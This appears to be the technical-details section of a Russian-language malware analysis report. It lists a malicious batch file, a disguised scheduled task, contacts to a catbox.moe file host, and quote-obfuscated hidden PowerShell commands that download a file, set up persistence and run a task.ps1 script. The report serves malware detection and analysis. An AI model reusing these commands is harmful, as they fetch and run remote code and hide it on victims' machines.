Техническая информация
- <SYSTEM32>\tasks\microsoftedgeupdatetask
- %TEMP%\1.bat
- %TEMP%\1.bat
- 'fi###.catbox.moe':443
- 'fi###.catbox.moe':443
- DNS ASK fi###.catbox.moe
- '<SYSTEM32>\cmd.exe' /d /s /c "cmd.exe /c "%TEMP%\1.bat"" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\1.bat"
- '<SYSTEM32>\attrib.exe' +h "%APPDATA%\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoPr"o"file -Execu"t"ionP"o"lic"y" Byp"a"ss -Windo"w"Style Hid"d"en -Com"m"and "$action = New-ScheduledT"a"skAction -Execute 'powershell.exe' -Argument '-NoProfile -Exe"c"utionPo"l"icy B"y"pas...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoPr"o"file -Exe"c"utionPol"i"cy By"p"ass -Win"d"owStyle H"i"dd"e"n -Co"m"mand "Invo"k"e-W"e"bRequ"e"st 'ht"t"ps://"f"iles."c"atbo"x".moe/gmxpmy.txt' -OutFile '%APPDATA%\Mi"c"roso"f"t\Wi"n"dow...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -N"o"Profi"l"e -Execu"t"ionPol"i"cy Bypa"s"s -WindowSt"y"le Hi"d"den -Fi"l"e "%APPDATA%\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1"